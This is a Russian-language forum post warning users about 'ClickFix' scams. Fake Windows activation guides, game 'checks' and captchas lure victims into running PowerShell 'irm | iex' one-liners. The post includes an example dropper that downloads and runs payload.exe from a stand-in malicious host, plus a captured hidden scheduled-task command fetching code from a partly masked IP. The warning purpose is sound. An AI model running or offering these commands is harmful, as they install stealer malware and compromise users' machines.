(Click Fix) PowerShell Code in Windows activation and not only: how IEX and IWR methods help hackers

Всех приветствую, хотелось бы начать с небольшого предисловия. На форуме появляются темы из разряда активации Windows, и многие рекомендуют активировать его через cmd, уверяя, что все безопасно и ничего не подкачивается, но так ли это? Также были темы, где люди попадались на подобные решения, только уже в другом виде, но об этом мы поговорим позже.
Пример такого ответа:​

upload

Разберем что означает каждая из этих команд:
irm - (Invoke Rest-method) - данный метод используется для получения содержимого с интернет ресурса, через него как раз подгружается другой вредоносный повершеллкод с ресурса, для подгрузки непосредственно малвари.
iex - (Invoke-Expression) - выполняет полученную строку от команды выше, как код powershell.

1. Код, подгружаемой строкой на скрине может выглядеть примерно так, очевидно, что это простой дрoпер, бывают вариации добавляющие путь дрoпа в исключения через аддпатчэкслюжен

• $url = "http://malicious-site.com/payload.exe"
  $path = "$env:Temp\payload.exe"
  (New-Object System.Net.WebClient).DownloadFile($url, $path)
  Start-Process -FilePath $path
  

  Code

  $url = "http://malicious-site.com/payload.exe"
  
  $path = "$env:Temp\payload.exe"
  
  (New-Object System.Net.WebClient).DownloadFile($url, $path)
  
  Start-Process -FilePath $path
  

  Думаю понятно, давайте перейдем к реальным кейсам.
  
  1# Кейс
  К сожалению, материала у меня нет, так как я не мог физически встретить ситуацию, но условно она выглядит так, вы играете на паблике в любой игре, затем вас вызывают на проверку и говорят выполнить эту команду через cmd, затем там идёт обычный вывод, типа проверки, но после нее вы получали .NET щит ратку на устройство
  
  
  2# Кейс
  Это непосредственно активация, я буду рассматривать реальный недавний пример юзера этого форума, который наткнулся на это говно.
  Он гуглил как активировать виндовс без сторонних программ, в топе вылезла линк на статью на ресурсе vc.ru. Начало статьи выглядело примерно так
  
  Как мы можем заметить, тут уже знакомые нам вариации, я выполнил данную команду в изолированной среде и запустил специальный скрипт, который используя инструмент Event Viewer Windows вытащил запросы Powershell (код - 4104) после выполнения, затемпрогнал их через тулзу для форензики для удобства. Что делала строка? Она выкачала повершеллкод, дрoпающий в темп файл MAS_d08aa00e-57b3-410a-8cb6-c65fe353c99d.cmd после его старта:
  Выцепилась следующая интересная строчка:
  
  New-ScheduledTaskAction -Execute powershell.exe -Argument -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.2*2/0x55/3')"

  Code

  New-ScheduledTaskAction -Execute powershell.exe -Argument -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.2*2/0x55/3')"

  * - закрыл специально
  Она создавала запланированную задачу, которая выкачивала и запускала повершеллкод в скрытом режиме по линку 130.0.235.2*2/0x55/3
  
  Заглянем в его содержимое
  Как мы видим тут уже идёт реализация самого вредоноса, кому интересно его VT - https://www.virustotal.com/gui/file/8ad85e48a936a3c5dd0055304390502d676dce059ab77ce462b746d089f2470b/detection
  К сожалению, он сразу удалялся после выполнения, но я успел выхватить его дамп, на вид это обычный говно-*******, без какой-либо обфускации, отправляющий собранные данные в бота тг, написан крайне хуево и обсуждать здесь нечего
  
  
  
  
  
  Пример такого распространения через тикток
  
  
  В данном случае команда уже подгружала ******* под названием Vidar
  
  Кейс #3 - Капча на сайте
  Вы заходите на сайт, либо телеграм бота и вас просит пройти капчу, примеры:
  
  
  
  
  Статья вышла небольшой, но просто предупреждение юзерам, что если нихуя не знаете - лучше ничего не вводить, либо пользоваться доверенными решениями, где вы точно уверены что ничего не подхватите. Спасибо за прочтение